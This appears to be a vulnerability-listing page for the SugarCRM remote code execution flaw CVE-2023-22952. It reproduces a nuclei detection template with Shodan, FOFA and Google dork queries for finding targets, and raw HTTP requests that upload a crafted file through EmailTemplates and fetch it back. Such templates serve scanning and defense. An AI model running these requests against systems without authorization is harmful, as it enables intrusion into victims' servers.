CVE-2023-22952: SugarCRM Unauthenticated - Remote Code Execution

日期: 2025-08-01 | 影响软件: SugarCRM | POC: 已公开

漏洞描述

In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.

PoC代码[已公开]

id: CVE-2023-22952

info:
  name: SugarCRM Unauthenticated - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.
  reference:
    - https://attackerkb.com/topics/E486ui94II/cve-2023-22952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-22952
    cwe-id: CWE-20,CWE-94
    epss-score: 0.93756
    epss-percentile: 0.99852
    cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
  metadata:
    vendor: sugarcrm
    product: sugarcrm
    shodan-query:
      - http.html:"sugarcrm inc. all rights reserved"
      - http.title:"sugar setup wizard"
      - http.title:"sugarcrm"
    fofa-query:
      - body="sugarcrm inc. all rights reserved"
      - title="sugar setup wizard"
      - title=sugarcrm
    google-query:
      - intext:"sugarcrm inc. all rights reserved"
      - intitle:"sugar setup wizard"
      - intitle:sugarcrm
  tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - 'You must specify a valid username and password'

  - raw:
      - |-
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR
        Connection: close

        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="action"

        AttachFiles
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="module"

        EmailTemplates
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
        Content-Type: image/png

        {{ base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAUAAAAUBAMAAAC3y+roAAAAD1BMVEVDVkUtMjAyMy0yMjk1MiA7qbPWAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAEUlEQVQImWNgAAJGZQcGKgEAHPkAZVUOitsAAAAASUVORK5CYII=')}}
        ------WebKitFormBoundaryWeTJtA8WByYIQMGR--


    matchers:
      - type: word
        part: body
        internal: true
        words:
          - '["cache\/images\/{{randstr}}.txt"]'

  - raw:
      - |
        GET /cache/images/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2023-22952"

      - type: word
        part: header
        words:
          - "text/plain"
# digest: 490a0046304402202bc6e9d8d6e40781aec2d2db94905cfc0f2f0743f760c2d1235696cfe1e6e47b022058e8d6aded55b63eac57c7edd57d3bbb6a51ce10690770191fde278060be8a19:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-22952.yaml

相关漏洞推荐